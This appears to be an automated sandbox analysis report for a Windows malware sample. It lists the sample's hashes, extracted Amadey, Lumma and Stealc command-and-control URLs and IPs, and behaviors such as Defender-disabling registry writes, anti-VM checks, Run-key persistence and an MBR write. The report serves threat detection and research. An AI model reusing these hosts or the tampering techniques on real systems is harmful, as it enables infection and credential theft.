Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29/03/2025, 08:30
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
3563a8e325a1094e42df3e36be30699b
-
SHA1
f1aed8a155e5401a4a03510a448572f9cace7ad2
-
SHA256
55c2360e208a57c446ad972c638de1a18ef648a2b78eafec6a4857e8f72b6d4c
-
SHA512
c5ab7632a747ea5d9c471e965740f53240b9678f8b7c0b058cc5cd1b21d31afc4bc3798ecc3b9946c2f4989ecc9b102135637a3ee90ecfefca5c690938b42aab
-
SSDEEP
24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a0Ru:oTvC/MTQYxsWR7a0R
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
https://0wxayfarer.live/ALosnz
https://oreheatq.live/gsopp
https://faacastmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://qtargett.top/dsANGt
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/3408-576-0x0000000001140000-0x0000000001588000-memory.dmp healer behavioral1/memory/3408-577-0x0000000001140000-0x0000000001588000-memory.dmp healer behavioral1/memory/3408-638-0x0000000001140000-0x0000000001588000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 63685cf865.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 63685cf865.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 63685cf865.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 63685cf865.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 63685cf865.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 63685cf865.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 63685cf865.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 63685cf865.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 63685cf865.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 63685cf865.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b422135428.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4134bcbcf6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3e23f0d1f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f1b96dde78.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 63685cf865.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fb26e2dee5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ecdc428e8a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 21572c0b2a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 59ee8e938d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 93fb3e09f2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2228 powershell.exe 182 2708 powershell.exe 189 3604 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 3604 powershell.exe 2228 powershell.exe 1620 powershell.exe 3292 powershell.exe 2708 powershell.exe 4056 powershell.exe 3668 powershell.exe 3520 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 28 IoCs
flow pid Process 163 1776 rapes.exe 189 3604 powershell.exe 178 1776 rapes.exe 178 1776 rapes.exe 180 3392 svchost015.exe 13 1776 rapes.exe 29 2448 futors.exe 153 1776 rapes.exe 182 2708 powershell.exe 179 3768 svchost015.exe 185 3848 svchost015.exe 186 3132 svchost015.exe 172 1776 rapes.exe 28 2448 futors.exe 28 2448 futors.exe 4 2228 powershell.exe 34 2448 futors.exe 43 2448 futors.exe 7 1776 rapes.exe 7 1776 rapes.exe 16 1776 rapes.exe 16 1776 rapes.exe 16 1776 rapes.exe 16 1776 rapes.exe 16 1776 rapes.exe 16 1776 rapes.exe 135 2448 futors.exe 140 1776 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 2856 takeown.exe 1952 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4134bcbcf6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 63685cf865.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 21572c0b2a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 59ee8e938d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fb26e2dee5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 93fb3e09f2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b422135428.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4134bcbcf6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 21572c0b2a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b422135428.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3e23f0d1f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f1b96dde78.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 63685cf865.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 59ee8e938d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fb26e2dee5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ecdc428e8a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ecdc428e8a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3e23f0d1f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f1b96dde78.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 93fb3e09f2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe -
Executes dropped EXE 42 IoCs
pid Process 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 1776 rapes.exe 2992 Rm3cVPI.exe 2696 b422135428.exe 1532 amnew.exe 2448 futors.exe 2780 apple.exe 2816 22.exe 2916 22.exe 2708 gron12321.exe 2760 4134bcbcf6.exe 440 v7942.exe 848 alex1dskfmdsf.exe 2156 3e23f0d1f6.exe 2788 Bell_Setup16.exe 2596 Bell_Setup16.tmp 2080 Bell_Setup16.exe 2204 Bell_Setup16.tmp 1796 f1b96dde78.exe 272 bot.exe 984 e6701df100.exe 1716 jokererer.exe 3408 63685cf865.exe 3620 21572c0b2a.exe 3768 svchost015.exe 3932 59ee8e938d.exe 3132 svchost015.exe 3260 fb26e2dee5.exe 3392 svchost015.exe 3760 ecdc428e8a.exe 3848 svchost015.exe 3956 42c2c6457d.exe 3844 EPTwCQd.exe 3856 Rm3cVPI.exe 3928 7IIl2eE.exe 2588 Passwords.com 3044 93fb3e09f2.exe 3248 u75a1_003.exe 3368 TbV75ZR.exe 3668 1b48d113ab.exe 3868 TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE 2932 483d2fa8a0d53818306efeb32d3.exe -
Identifies Wine through registry keys 2 TTPs 14 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine f1b96dde78.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 63685cf865.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 59ee8e938d.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine fb26e2dee5.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine ecdc428e8a.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 4134bcbcf6.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 3e23f0d1f6.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 21572c0b2a.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 93fb3e09f2.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine b422135428.exe -
Loads dropped DLL 64 IoCs
pid Process 2228 powershell.exe 2228 powershell.exe 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 1776 rapes.exe 1776 rapes.exe 1776 rapes.exe 1776 rapes.exe 1776 rapes.exe 1532 amnew.exe 1776 rapes.exe 2780 apple.exe 2780 apple.exe 2780 apple.exe 2780 apple.exe 2448 futors.exe 2448 futors.exe 3008 WerFault.exe 3008 WerFault.exe 3008 WerFault.exe 3008 WerFault.exe 1776 rapes.exe 1776 rapes.exe 2448 futors.exe 2448 futors.exe 464 WerFault.exe 464 WerFault.exe 464 WerFault.exe 464 WerFault.exe 2448 futors.exe 2448 futors.exe 1336 WerFault.exe 1336 WerFault.exe 1336 WerFault.exe 1336 WerFault.exe 1776 rapes.exe 1776 rapes.exe 2448 futors.exe 2788 Bell_Setup16.exe 2596 Bell_Setup16.tmp 2596 Bell_Setup16.tmp 2596 Bell_Setup16.tmp 2080 Bell_Setup16.exe 2204 Bell_Setup16.tmp 2204 Bell_Setup16.tmp 3012 regsvr32.exe 1776 rapes.exe 1776 rapes.exe 2448 futors.exe 2448 futors.exe 1776 rapes.exe 2448 futors.exe 2448 futors.exe 604 WerFault.exe 604 WerFault.exe 604 WerFault.exe 604 WerFault.exe 1776 rapes.exe 1776 rapes.exe 2448 futors.exe 2448 futors.exe 3620 21572c0b2a.exe 1776 rapes.exe 1776 rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2856 takeown.exe 1952 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 63685cf865.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 63685cf865.exe -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\3e23f0d1f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367480101\\3e23f0d1f6.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\f1b96dde78.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367490101\\f1b96dde78.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\e6701df100.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367500101\\e6701df100.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\63685cf865.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367510101\\63685cf865.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\21572c0b2a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10043750101\\21572c0b2a.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\fb26e2dee5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10043760101\\fb26e2dee5.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\1b48d113ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367620101\\1b48d113ab.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367630121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 b422135428.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000019623-395.dat autoit_exe behavioral1/files/0x000500000001c8e3-1516.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3776 tasklist.exe 3800 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 2856 TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE 1776 rapes.exe 2696 b422135428.exe 2760 4134bcbcf6.exe 2156 3e23f0d1f6.exe 1796 f1b96dde78.exe 3408 63685cf865.exe 3620 21572c0b2a.exe 3932 59ee8e938d.exe 3260 fb26e2dee5.exe 3760 ecdc428e8a.exe 3044 93fb3e09f2.exe 3868 TempZ3M2RN3EQL2RSXBMV2NGCEGXBJKOHZCM.EXE 2932 483d2fa8a0d53818306efeb32d3.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3620 set thread context of 3768 3620 21572c0b2a.exe 160 PID 3932 set thread context of 3132 3932 59ee8e938d.exe 162 PID 3260 set thread context of 3392 3260 fb26e2dee5.exe 164 PID 3760 set thread context of 3848 3760 ecdc428e8a.exe 167 -
Drops file in Program Files directory 46 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1836 sc.exe 292 sc.exe 2492 sc.exe 2748 sc.exe 2400 sc.exe 2280 sc.exe 2224 sc.exe 1732 sc.exe 1148 sc.exe 2992 sc.exe 2196 sc.exe 2616 sc.exe 444 sc.exe 1716 sc.exe 2176 sc.exe 2352 sc.exe 2592 sc.exe 2904 sc.exe 1128 sc.exe 1976 sc.exe 1336 sc.exe 2292 sc.exe 1216 sc.exe 1704 sc.exe 2908 sc.exe 376 sc.exe 892 sc.exe 2064 sc.exe 2572 sc.exe 2888 sc.exe 1544 sc.exe 872 sc.exe 876 sc.exe 612 sc.exe 1588 sc.exe 2284 sc.exe 1712 sc.exe 752 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3916 3044 WerFault.exe 194 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 93fb3e09f2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u75a1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fb26e2dee5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f1b96dde78.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 63685cf865.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4134bcbcf6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 21572c0b2a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 59ee8e938d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened 